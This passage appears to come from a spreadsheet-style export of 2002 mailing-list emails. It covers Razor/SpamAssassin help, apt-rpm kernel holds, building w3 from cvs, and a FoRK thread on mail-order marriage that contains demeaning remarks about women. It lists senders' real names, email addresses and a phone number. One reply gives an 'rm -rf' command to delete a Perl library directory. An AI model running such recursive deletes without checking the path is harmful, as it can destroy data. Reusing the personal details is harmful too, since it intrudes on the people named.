&gt;                                Patrick Greenwell &gt;          Asking the wrong questions is the leading cause of wrong &gt; answers &gt; \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ &gt; \/\/\/ &gt;  &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by:ThinkGeek &gt; Welcome to geek heaven. &gt; [URL]http://thinkgeek.com[/URL]  &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by:ThinkGeek &gt; Welcome to geek heaven. &gt; [URL]http://thinkgeek.com[/URL]  &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net  &gt; [URL]https://lists.sourceforge.net[/URL] --  Vipul Ved Prakash          |   "The future is here, it's just not  Software Design Artist     |    widely distributed." [URL]http://vipul.net[/URL]          |              -- William Gibson ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "One Income Living" &lt;OneIncomeLiving@groups.msn.com&gt;\nFrom: "joyful" &lt;abcusa88@hotmail.com&gt;\nDate: Thu, 8 Aug 2002 09:45:04 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 09:45:04 -0700</t>
  </si>
  <si>
    <t>"joyful" &lt;abcusa88@hotmail.com&gt;</t>
  </si>
  <si>
    <t>"One Income Living" &lt;OneIncomeLiving@groups.msn.com&gt;</t>
  </si>
  <si>
    <t>Hi! I'm new here.</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_156E6_01C23EC0.4579FA60 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We attempted to deliver this message to you with HTML formatting. = However, your e-mail program does not support HTML-enhanced messages. = Please go to your E-mail Settings for this group and change your E-mail = Preference to "Text only". [URL]http://groups.msn.com[/URL] MSN Groups ------=_NextPart_000_156E6_01C23EC0.4579FA60 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable    New Message on One Income = Living Hi! I'm new here. =09      Reply Â  Reply to Sender 		          Â Â Recommend Message 1 in = Discussion                                 =20 		             	   =20          From:  joyful I just found out that using dry milkÂ can save half of = the money buying liquid milk, also save spaces in the frig. I recently = bought an extended warranty through the internet instead of dealer, = which saved me over $1000. I likeÂ your group, there are great = suggestions. I'm thinking to work at home using my computer, but didn't = find anything yet. Anybody has updates?It is more important to me = toÂ make a little than save a little. Thank you all! View other = groups in this category.     = Also on = MSN:Start ChattingÂ |Â Listen to MusicÂ |Â House &amp; HomeÂ |Â Try Online = DatingÂ |Â Daily Horoscopes=20                   To stop getting this e-mail, or change how often it = arrives, go to your E-mail Settings.           		                  Need help? If you've forgotten your password, please = go to Passport Member Services.           		                  For other questions or feedback, go to our Contact Us page.           		                  If you do not want to receive future e-mail from = this MSN group, or if you received this message by mistake, please click = the "Remove" link below. On the pre-addressed e-mail message that opens, = simply click "Send". Your e-mail address will be deleted from this = group's mailing list.            Remove my e-mail address from One = Income Living. ------=_NextPart_000_156E6_01C23EC0.4579FA60--</t>
  </si>
  <si>
    <t>http://groups.msn.com</t>
  </si>
  <si>
    <t>To: "John Evdemon" &lt;jevdemon@acm.org&gt;, fork@spamassassin.taint.org\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Thu, 8 Aug 2002 00:10:42 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 00:10:42 -0400</t>
  </si>
  <si>
    <t>"John Evdemon" &lt;jevdemon@acm.org&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: Quitting Music</t>
  </si>
  <si>
    <t>Don't get your hopes up.   This a career move.   Next stop Hollywood.\nRemember Madonna, The Actress?\n\nEirikur\n\n\n\n\nOn Wednesday 07 August 2002 06:56 pm, John Evdemon wrote:\n&gt; Keep your fingers crossed...\n&gt; Exhausted Britney 'wants to quit music'\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 7 Feb 2002 15:15:41 +0100</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 15:15:41 +0100</t>
  </si>
  <si>
    <t>Re: rpm-zzzlist@freshrpms.net</t>
  </si>
  <si>
    <t>Once upon a time, dTd wrote : &gt;  &gt; Thanks for the great work Mathias but I would like to point out that this &gt; list is fastly become the apt-rpm-list instead of the rpm-list. The &gt; discussion concerning apt is overwhelming. Maybe another list is in order &gt; for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :) &gt;  &gt; Though I think apt-rpm is a great tool, I don't use it and would like to &gt; get back to talk of new packages and rpm building techniques. Hmmm, know what? On [URL]http://lists.freshrpms.net[/URL] the apt-list has been up for a while now ;-) There is almost no traffic though, since I wanted to keep that list for apt-rpm on the server side (mirrors, building repositories etc.), but hey, it could be a good place for general apt-rpm questions ;-) Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://lists.freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@cs.Helsinki.FI&gt;\nDate: Thu, 7 Feb 2002 11:37:12 +0200</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 11:37:12 +0200</t>
  </si>
  <si>
    <t>Re: About apt, kernel updates and dist-upgrade</t>
  </si>
  <si>
    <t>On Thu, Feb 07, 2002 at 12:29:14AM +0200, Peter Peltonen wrote: &gt; About apt.conf there are these lines: &gt; ---- &gt; RPM  &gt; { &gt;    // Leave list empty to disable &gt;    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; }; &gt;    HoldPkgs {"kernel-source"; "kernel-headers"; }; &gt; } &gt; ---- &gt;  &gt; How do I tell apt hold all kernel packages? Can I use syntax like  &gt; "kernel*"; ?  &gt;  &gt; And I don't quite understand what the part "^kernel$"; means? You could read about regular expressions. ^kernel$ matches "kernel" and nothimg more. Kerne, kernel-smp and kernel-enterprise are the kernel packages you might be running in a RH system. Packages like kernel-headers, kernel-BOOT and kernel-doc aren't matched. If it just said "kernel", it would match *all* those packages. --  "You were good with that recorder." (=nokkahuilu) "Soitit hyvin sit mankkaa." 	-- (Suomennos) Men Behaving Badly _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: dTd &lt;dandanielle@mindspring.com&gt;\nDate: Thu, 7 Feb 2002 09:07:50 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 09:07:50 -0500 (EST)</t>
  </si>
  <si>
    <t>dTd &lt;dandanielle@mindspring.com&gt;</t>
  </si>
  <si>
    <t>Thanks for the great work Mathias but I would like to point out that this list is fastly become the apt-rpm-list instead of the rpm-list. The discussion concerning apt is overwhelming. Maybe another list is in order for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :) Though I think apt-rpm is a great tool, I don't use it and would like to get back to talk of new packages and rpm building techniques. dTd Daniel T. Drea dandanielle@mindspring.com [URL]http://dandanielle.home.mindspring.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://dandanielle.home.mindspring.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Peter Peltonen &lt;pisara@iki.fi&gt;\nDate: Thu, 7 Feb 2002 00:29:14 +0200</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 00:29:14 +0200</t>
  </si>
  <si>
    <t>About apt.conf there are these lines: ---- RPM  {    // Leave list empty to disable    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };    HoldPkgs {"kernel-source"; "kernel-headers"; }; } ---- How do I tell apt hold all kernel packages? Can I use syntax like  "kernel*"; ?  And I don't quite understand what the part "^kernel$"; means? --  Peter _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Darragh" &lt;darraghoheiligh@eircom.net&gt;\nDate: Thu, 5 Sep 2002 23:53:32 +0100</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 23:53:32 +0100</t>
  </si>
  <si>
    <t>"Darragh" &lt;darraghoheiligh@eircom.net&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] Newby to Linux looking for information on cvs</t>
  </si>
  <si>
    <t>Hello all, Firstly I'd like to thank all of you for the fast and very helpful feedback that I got to my question today.  I have one more question though.  I downloaded the w3 and url files from the server at the first try thanks to the help that I received today.  Then though I tried to build them.  I started by trying the w3 program.  I used the following lines which produced some strange results.  Would any one be able to set me straight? ./configure --with-emacs --prefix=/usr/local/src/beta/w3 --exec-prefix=/usr/ local/src/beta/w3 --with-url=/url/url That worked fine so I moved to the next step. make At the bottem of the text I got the following messages: Cannot open load file: /url/url/url-vars.el make[1]: *** [custom-load.el] Error 255 make[1]: Leaving directory `/usr/local/src/beta/w3/lisp' make: *** [w3] Error 2 When I got around to trying the url package I had no problems.  In saying that this doesn't necessarily mean that I was doing it right so below are the commands I used. ./configure --with-emacs --prefix=/url/url --exec-prefix=/url/url followed by the commands make and make install. There is no text files which contain help on installing the url package so I'm not completely certain if I've used the right method here. Thanks again Darragh ----- Original Message ----- From: "Hunt, Bryan"  To: ;  Cc:  Sent: Thursday, September 05, 2002 5:08 PM Subject: OT: RE: [ILUG] Newby to Linux looking for information on cvs &gt; &gt; speaking of that IDE (weblogic developer) the open source version called &gt; eclipse is free from eclipse.org If you are doing java development you &gt; need to get this IDE . I've been using it for the last month and it is &gt; absolutly superb. Best thing about it is that rather than using swing &gt; (which is crap) is that they have their own native widget set called swt. &gt; &gt; When you run it on windows it uses windows widgets but when you run it on &gt; linux it uses gtk, you should see it on gnome 2 ! Absolutely stunning ! &gt; &gt; --B &gt; &gt; -----Original Message----- &gt; From: Justin MacCarthy [mailto:macarthy@iol.ie] &gt; Sent: 05 September 2002 16:53 &gt; To: michael.conry@ucd.ie &gt; Cc: ilug@linux.ie &gt; Subject: RE: [ILUG] Newby to Linux looking for information on cvs &gt; &gt; &gt; This is the best step by step guide to setting up cvs on Redhat.. &gt; &gt; [URL]http://www7b.software.ibm.com[/URL] &gt; &amp;l=456,t=gr &gt; &gt; It is for a particular IBM ide, but the setup and testing of the server is &gt; the same for any CVS client &gt; &gt; Both The "Using Linux" and "Linux in a nutshell" book by Oreilly have &gt; sections on cvs /rcs , and both books are a must buy for any linux newbie &gt; &gt; &gt; Justin &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of &gt; &gt; Michael Conry &gt; &gt; Sent: 05 September 2002 16:34 &gt; &gt; To: Darragh &gt; &gt; Cc: ilug@linux.ie &gt; &gt; Subject: Re: [ILUG] Newby to Linux looking for information on cvs &gt; &gt; &gt; &gt; &gt; &gt; On 0020 +0100 %{!Thu, Sep 05, 2002 at  3:55:16PM +0100}, Darragh wrote: &gt; &gt; &gt; Hello, &gt; &gt; &gt; I am very new to Linux and need some help on a utility called &gt; &gt; cvs.  As far &gt; &gt; &gt; as I'm aware its a similar protocol to FTP.  I need to use it &gt; &gt; to download a &gt; &gt; &gt; program from :pserver:anoncvs@subversions.gnu.org:/cvsroot/w3. &gt; &gt; I am looking &gt; &gt; &gt; for information on how to use it.  I'll have another look at &gt; &gt; the man pages &gt; &gt; &gt; but I think I have to set it up before I can download anything. &gt; &gt; cvs is really a very different kind of thing to FTP, but the details of &gt; &gt; that statement are left as an exercise to the reader (won't show up my &gt; &gt; own ignorance that way ;-) &gt; &gt; The application you want is cvsclient... &gt; &gt; There is documentation here: &gt; &gt; [URL]http://www.fokus.gmd.de[/URL] &gt; &gt; &gt; &gt; You might get a quick idea of how it works from here: &gt; &gt; [URL]http://www.sci.muni.cz[/URL] &gt; &gt; where he explains how to get cvs gnuplot... &gt; &gt; The commands are: &gt; &gt; &gt; &gt; export &gt; &gt; CVSROOT=:pserver:anonymous@cvs.gnuplot.sourceforge.net:/cvsroot/gnuplot &gt; &gt; cvs login &gt; &gt; cvs -z3 checkout gnuplot &gt; &gt; &gt; &gt; Something similar will probably do the job for you.  I'm guessing the &gt; &gt; following MIGHT work... &gt; &gt; &gt; &gt; export CVSROOT=:pserver:anoncvs@subversions.gnu.org:/cvsroot/w3 &gt; &gt; cvs login &gt; &gt; cvs -z3 checkout w3 &gt; &gt; &gt; &gt; m &gt; &gt; -- &gt; &gt; Michael Conry   Ph.:+353-1-7161987, Web: [URL]http://www.acronymchile.com[/URL] &gt; &gt; Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C &gt; &gt; &gt; &gt; -- &gt; &gt; Irish Linux Users' Group: ilug@linux.ie &gt; &gt; [URL]http://www.linux.ie[/URL] for (un)subscription &gt; &gt; information. &gt; &gt; List maintainer: listmaster@linux.ie &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -- &gt; Irish Linux Users' Group: ilug@linux.ie &gt; [URL]http://www.linux.ie[/URL] for (un)subscription information. &gt; List maintainer: listmaster@linux.ie &gt; &gt; -- &gt; Irish Linux Users' Group: ilug@linux.ie &gt; [URL]http://www.linux.ie[/URL] for (un)subscription information. &gt; List maintainer: listmaster@linux.ie &gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www7b.software.ibm.com http://www.fokus.gmd.de http://www.sci.muni.cz http://www.acronymchile.com http://www.linux.ie http://www.linux.ie http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nFrom: bitbitch@magnesium.net\nDate: Thu, 5 Sep 2002 23:41:16 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 23:41:16 -0400</t>
  </si>
  <si>
    <t>Re[2]: Selling Wedded Bliss (was Re: Ouch...)</t>
  </si>
  <si>
    <t>Hello Adam,\n\nThursday, September 05, 2002, 11:33:18 PM, you wrote:\n\n\nALB&gt; So, you're saying that product bundling works? Good point.\n\nSometimes I wish I was still in CA.  You deserve a good beating every\nso often...  (anyone else want to do the honors?)\n\nALB&gt; And how is this any different from "normal" marriage exactly? Other then\nALB&gt; that the woman not only gets a man, but one in a country where both she and\nALB&gt; her offspring will have actual opportunities? Oh and the lack of\nALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?\n\nMmkay.  For the nth time Adam, we don't live in the land of\nAdam-fantasy.  Women actually are allowed to do things productive,\nindependent and entirely free of their male counterparts.  They aren't\nforced to cook and clean and merely be sexual vessels.   Sometimes,\nand this will come as a shock to you, no doubt, men and women even\nfind -love- (which is the crucial distinction between this system) and\nthey marry one another for the satisfaction of being together.   I\nknow, far-fetched and idealistically crazy as it is, but such things\ndo happen.   I can guarantee you, if my mother was approached by my\nfather, and 25 years ago, he commented on her cleaning ability as a\nmotivator for marrying her, we would not be having this conversation\nnow.\n\nIf guys still have silly antequated ideas about 'women's role' then\ntheir opportunities for finding women _will_ be scarce.   Again, these\nsituations are great, provided everyone is aware that the relationship\nis a contractual one -- he wants a maid, a dog and a prostitute he\ndoesn't have to pay, and she wants a country that isn't impoverished\nand teeming with AIDS.  A contract, versus a true love-interest\nmarriage.\n\nEgh.  I really need to stop analyzing your posts to this extent.   I\nblame law school and my cat.\n\n-BB\n\nALB&gt; - Adam L. "Duncan" Beberg\nALB&gt;   [URL]http://www.mithral.com[/URL]\nALB&gt;   beberg@mithral.com\n\n\n\n\n\n-- \nBest regards,\n bitbitch                            mailto:bitbitch@magnesium.net</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Jon Downes" &lt;jon@eclipse.co.uk&gt;\nDate: Thu, 5 Sep 2002 22:31:31 +0100</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 22:31:31 +0100</t>
  </si>
  <si>
    <t>"Jon Downes" &lt;jon@eclipse.co.uk&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] FWD (TLCB) Jimmy Carter: The Troubling, New Face of America</t>
  </si>
  <si>
    <t>Of course, everyone knows that Owlman is a work of fuggin` genius\n\nJ\n\n\n\n\n&gt; Hey, I met the wizard bloke from Owlman, who wants to touch me!!\n&gt; \n&gt; Dave\n\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Thu, 5 Sep 2002 21:27:18 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 21:27:18 -0400</t>
  </si>
  <si>
    <t>Ouch.... hooooo.... Cheers, RAH --- begin forwarded text Date: Thu,  5 Sep 2002 09:17:13 -0700 From: Same Guy Subject: Re: Electric car an Edsel... To: "R. A. Hettinga"   Bob, This guy's an idiot. I design loads for systems with the 50 kV capacitors.  One of those has 864 of such capacitors and stores only 10 megajoules, which means 11 kilojoules each.  They weigh 125 kg. You need high energy per unit mass, and the capacitive system I picked maximizes that. It is precisely the system that Maxwell is touting for electrical braking and power augmentation for regenerative use in automobiles.  You also need voltage you can use in a DC motor, which is why though the actual capacitors in the system are charged to 2.5 volts, the system has them arranged in series to boost the voltage. Ignore him.  He's a waste of my time. ------------------------   From: "R. A. Hettinga"    Subject: Re: Electric car an Edsel...   Date: Wed, 4 Sep 2002 15:31:39 -0400   To: Some people... --- begin forwarded text Date: Wed, 4 Sep 2002 07:59:10 -0700 (PDT) From: "Adam L. Beberg"  To: "R. A. Hettinga"  cc:  Subject: Re: Electric car an Edsel... On Wed, 4 Sep 2002, R. A. Hettinga wrote: &gt; Maxwell ([URL]www.maxwell.com[/URL] makes and sells high energy density capacitors, &gt; called ultracapacitors.  They deliver them in an air-cooled, voltage &gt; regulated module that will charge to 42 V and hold 128 kilojoules -- roughly &gt; the energy in 2 teaspoons of sugar or a bite of a donut -- and weighs 16 &gt; kilograms.  If that electrical energy could all be converted to kinetic &gt; energy, there's enough to get the capacitor module up to about 200 mph -- in &gt; a vacuum. Since the energy you can pack into a capacitor is something like 1/2*C*(V^2), you want to design your system with the lowest voltage possible to fully exploit that V^2 ;) So yea, a 42V system will only be useful for accelerating insects, not cars. That must be why 40kV is standard not 42. (the joke of putting 42 into goggle to find that model was not missed BTW) Most production systems use a mix of batteries and capacitors, as very few real world applications run for less then 10 seconds like the car we were talking about originally. Even 10 seconds is pushing the "capactior is the wrong choice" limits. Thats why the landspeed record model is a battery one, it's got to run for a much longer period of time and needs a steady discharge curve. But it should be safe to say that most people want the Indy 500 version, not the 1/4 mile sprint version when they are looking for a vehice :) For those you dont want a battery or a capacitor, you want to take advantage of whole atoms, not just electrons. Then you can suck off the electrons you need with a fuel cell. However, you will use both capacitors for the braking/accel, and batteries to not just dump excess energy in the design. - Adam L. "Duncan" Beberg   [URL]http://www.mithral.com[/URL]   beberg@mithral.com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End of Original Message-----------------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To: &lt;bitbitch@magnesium.net&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 5 Sep 2002 21:16:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 21:16:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:\n\n&gt; Again, these situations are great, provided everyone is aware that the\n&gt; relationship is a contractual one -- he wants a maid, a dog and a\n&gt; prostitute he doesn't have to pay, and she wants a country that isn't\n&gt; impoverished and teeming with AIDS.\n\nYou assume that they just match people up and marry them off, and neither is\nattracted to the other, which is not the case. Even this has arranged\nmarrage beat by a long way.\n\nMales gets: A wife for a while, and if they actually like each other, for a\nlong time.\nFemale gets: Into Britan, out of a country with no real rights for women, no\nopportunities for her or her children, out of the polution, AIDS, and an\nuncountable number of scary tropical diseases. Not to mention in most cases\nliving conditions that us spoiled Americans cannot even comprehend.\n\nYea, the women is definately getting tha bad end of the deal here.\n\nYou're so easy to taunt :)\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com</t>
  </si>
  <si>
    <t>To: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Thu, 5 Sep 2002 20:53:16 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 20:53:16 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] Problem with Razor 2.14 and Spamassassin 2.41</t>
  </si>
  <si>
    <t>--Enx9fNJ0XV5HaWRu\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:\n&gt; You might be better asking this on the spamassassin-talk list.  The folks=\n=20\n&gt; there will almost definitely have an answer for this.\n\nI posted a fairly lengthy complete answer to this problem and how to\nget around it in SA 2.41 on the spamassassin-talk list. :)\n\n--=20\nRandomly Generated Tagline:\n"Good judgment comes from bad experience, and a lot of that comes from\n bad judgment." - Zen Musings\n\n--Enx9fNJ0XV5HaWRu\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9d/x7AuOQUeWAs2MRAtAFAKDAv2ned2UEMjxqPm2PknM7USMCdgCggFr+\nONI0BQ6UcqCITZKsDjr5hRc=\n=Wyzr\n-----END PGP SIGNATURE-----\n\n--Enx9fNJ0XV5HaWRu--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.gnupg.org https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Josh Hildebrand &lt;josh@jedi.net&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Thu, 5 Sep 2002 20:51:41 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 20:51:41 -0400</t>
  </si>
  <si>
    <t>Josh Hildebrand &lt;josh@jedi.net&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] removing Razor1</t>
  </si>
  <si>
    <t>--iJXiJc/TAIT2rh2r\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Thu, Sep 05, 2002 at 05:11:32PM -0500, Josh Hildebrand wrote:\n&gt; If that's the case, can someone please point me to something that explains\n&gt; how to remove Razor1 from my system?  I don't see a point in envoking it.\n&gt; Especially when it appears to error out on me.\n&gt;=20\n&gt; Problem while trying to load Razor1: Permission denied  at\n&gt; /usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 288.\n&gt; debug: leaving helper-app run mode\n\nrm -rf /usr/local/lib/perl5/site_perl/5.6.1/Razor\n\n(you'll want to check that path first of course...)\n\n--=20\nRandomly Generated Tagline:\n"It's a chicken finger device."            - Theo, looking at entree\n\n--iJXiJc/TAIT2rh2r\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9d/wdAuOQUeWAs2MRAsXtAJ9ZJezMTsUuIw/Q3MMkZ6/QAyuYGgCgtc3/\niUYXa6+6icdddeWovza09lk=\n=46WZ\n-----END PGP SIGNATURE-----\n\n--iJXiJc/TAIT2rh2r--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;bitbitch@magnesium.net&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 5 Sep 2002 20:33:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 20:33:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Selling Wedded Bliss (was Re: Ouch...)</t>
  </si>
  <si>
    <t>On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:\n\n&gt; Yet another case where 'marriage' is actually an inappropriate word\n&gt; for these guys.  What they want is 'housekeeper' 'dog' and\n&gt; 'prostitute'.\n\nSo, you're saying that product bundling works? Good point.\n\nAnd how is this any different from "normal" marriage exactly? Other then\nthat the woman not only gets a man, but one in a country where both she and\nher offspring will have actual opportunities? Oh and the lack of\n"de-feminized, over-sized, self-centered, mercenary-minded" choices?\n\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Thu, 5 Sep 2002 20:11:53 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 20:11:53 -0500 (EST)</t>
  </si>
  <si>
    <t>And you were exactly the person I figured would do so.  On Thu, 5 Sep 2002, Theo Van Dinter wrote: &gt; On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote: &gt; &gt; You might be better asking this on the spamassassin-talk list.  The folks  &gt; &gt; there will almost definitely have an answer for this. &gt;  &gt; I posted a fairly lengthy complete answer to this problem and how to &gt; get around it in SA 2.41 on the spamassassin-talk list. :) &gt;  &gt;  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ler+geocache@lerctr.org&gt;\nFrom: "Geocaching Notify Bot" &lt;notify@geocaching.com&gt;\nDate: Thu, 5 Sep 2002 19:41:06 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 19:41:06 -0700</t>
  </si>
  <si>
    <t>"Geocaching Notify Bot" &lt;notify@geocaching.com&gt;</t>
  </si>
  <si>
    <t>&lt;ler+geocache@lerctr.org&gt;</t>
  </si>
  <si>
    <t>Geocaching.com Weekly Cache Notification</t>
  </si>
  <si>
    <t>Greetings from Geocaching.com -\n\n\nRecent caches in your area...\n\n9/2/2002 (Texas)\nFish Eye View by Silly Squadron\n(Traditional Cache) (GC8917) (2.04 miles NW)\n[URL]http://www.geocaching.com[/URL]\n\n9/2/2002 (Texas)\nPonce de Leon by Mudbug\n(Traditional Cache) (GC8889) (12.25 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n10/27/2002 (Texas)\nNTGA Org. Meeting/Class by Wolf Song\n(Event Cache) (GC81C2) (25.8 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/22/2002 (Texas)\nNTGA Organizational Meeting/Class by Wolf Song\n(Event Cache) (GC81C1) (25.8 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/1/2002 (Texas)\nTiger's Den by Texas tiger\n(Traditional Cache) (GC87D5) (33.14 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n8/31/2002 (Texas)\nHike It or Bike It by Zorro\n(Multi-Cache) (GC874D) (41.81 miles S)\n[URL]http://www.geocaching.com[/URL]\n\n9/28/2002 (Texas)\nDFW Field Day #1 by loubob57\n(Event Cache) (GC8644) (47.92 miles W)\n[URL]http://www.geocaching.com[/URL]\n\n9/5/2002 (Texas)\nPirates Booty by Nitehawker\n(Traditional Cache) (GC8A34) (50.51 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/2/2002 (Texas)\nThe Gates of First Monday by GeoVamp\n(Virtual Cache) (GC8937) (54.01 miles SE)\n[URL]http://www.geocaching.com[/URL]\n\n9/2/2002 (Texas)\nDallas Bound I-20 Cache by GeoVamp\n(Traditional Cache) (GC892E) (64.33 miles SE)\n[URL]http://www.geocaching.com[/URL]\n\n8/31/2002 